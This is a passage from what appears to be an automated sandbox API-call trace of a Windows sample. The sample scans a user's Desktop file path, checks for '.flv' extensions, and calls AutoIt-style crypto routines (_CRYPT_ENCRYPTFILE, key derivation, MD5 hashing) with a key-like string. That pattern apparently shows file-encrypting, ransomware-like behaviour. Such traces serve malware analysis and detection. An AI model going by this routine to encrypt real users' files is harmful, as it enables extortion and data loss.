lpString1="5p5NrGJn0jS HALPmcxz\\Desktop\\FL0fY8Lpz-WJNvLo.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Desktop\\FL0fY8Lpz-WJNvLo.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Desktop\\FL0fY8Lpz-WJNvLo.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Desktop\\FL0fY8Lpz-WJNvLo.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Desktop\\FL0fY8Lpz-WJNvLo.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Desktop\\FL0fY8Lpz-WJNvLo.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Desktop\\FL0fY8Lpz-WJNvLo.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Desktop\\FL0fY8Lpz-WJNvLo.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Desktop\\FL0fY8Lpz-WJNvLo.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Desktop\\FL0fY8Lpz-WJNvLo.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Desktop\\FL0fY8Lpz-WJNvLo.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Desktop\\FL0fY8Lpz-WJNvLo.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Desktop\\FL0fY8Lpz-WJNvLo.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Desktop\\FL0fY8Lpz-WJNvLo.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Desktop\\FL0fY8Lpz-WJNvLo.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Desktop\\FL0fY8Lpz-WJNvLo.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Desktop\\FL0fY8Lpz-WJNvLo.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Desktop\\FL0fY8Lpz-WJNvLo.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Desktop\\FL0fY8Lpz-WJNvLo.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Desktop\\FL0fY8Lpz-WJNvLo.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Desktop\\FL0fY8Lpz-WJNvLo.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Desktop\\FL0fY8Lpz-WJNvLo.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop\\FL0fY8Lpz-WJNvLo.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop\\FL0fY8Lpz-WJNvLo.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop\\FL0fY8Lpz-WJNvLo.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top\\FL0fY8Lpz-WJNvLo.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op\\FL0fY8Lpz-WJNvLo.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p\\FL0fY8Lpz-WJNvLo.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\FL0fY8Lpz-WJNvLo.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FL0fY8Lpz-WJNvLo.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L0fY8Lpz-WJNvLo.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0fY8Lpz-WJNvLo.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fY8Lpz-WJNvLo.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Y8Lpz-WJNvLo.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8Lpz-WJNvLo.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Lpz-WJNvLo.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pz-WJNvLo.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z-WJNvLo.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-WJNvLo.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WJNvLo.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JNvLo.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.108] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0161.108] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0161.108] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0161.108] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0161.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0161.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0161.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="flv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0161.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".flv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0161.108] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0161.108] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0161.108] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0161.108] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0161.108] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.108] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FL0fY8Lpz-WJNvLo.flv", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ed1cf80, ftCreationTime.dwHighDateTime=0x1d5e7d3, ftLastAccessTime.dwLowDateTime=0xac0935f0, ftLastAccessTime.dwHighDateTime=0x1d5dbc6, ftLastWriteTime.dwLowDateTime=0xac0935f0, ftLastWriteTime.dwHighDateTime=0x1d5dbc6, nFileSizeHigh=0x0, nFileSizeLow=0x16c92, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="FL0fY8Lpz-WJNvLo.flv", cAlternateFileName="FL0FY8~1.FLV")) returned 0x90ae18 [0161.108] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0161.109] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.109] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0161.109] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.109] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0161.109] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0161.109] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.109] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0161.109] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.109] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.109] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0161.109] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0161.109] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0161.109] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.109] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.109] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0161.109] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0161.109] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.109] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c88) returned 1 [0161.111] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.111] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.111] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0161.111] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0161.111] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0161.111] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.111] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.111] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.112] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0161.112] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0161.112] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0161.112] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.112] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.112] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.112] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.112] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0161.112] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.112] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.112] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0161.112] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0161.112] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0161.112] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0161.112] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0161.112] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0161.112] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0161.113] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0161.113] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0161.113] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0161.113] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.113] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.113] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0161.113] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0161.113] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0161.113] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0161.113] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.113] CryptCreateHash (in: hProv=0x9c0c88, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0161.113] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.113] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.113] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.113] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.113] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0161.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0161.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0161.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0161.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0161.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0161.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0161.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0161.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0161.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0161.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0161.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0161.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0161.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0161.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0161.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0161.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0161.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc198 | out: hHeap=0x8a0000) returned 1 [0161.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0161.114] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0161.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0161.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0161.115] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="XNGnHuBtZMP7Oc4UntiQCY9VF", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0161.115] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="XNGnHuBtZMP7Oc4UntiQCY9VF", cchWideChar=26, lpMultiByteStr=0x8df050, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="XNGnHuBtZMP7Oc4UntiQCY9VF", lpUsedDefaultChar=0x0) returned 26 [0161.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df050 | out: hHeap=0x8a0000) returned 1 [0161.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0161.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0161.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0161.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0161.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0161.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc198 | out: hHeap=0x8a0000) returned 1 [0161.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0161.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0161.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0161.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0161.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0161.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0161.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0161.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0161.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0161.115] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.116] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0161.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0161.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0161.116] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0161.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0161.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0161.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0161.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0161.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0161.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0161.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: 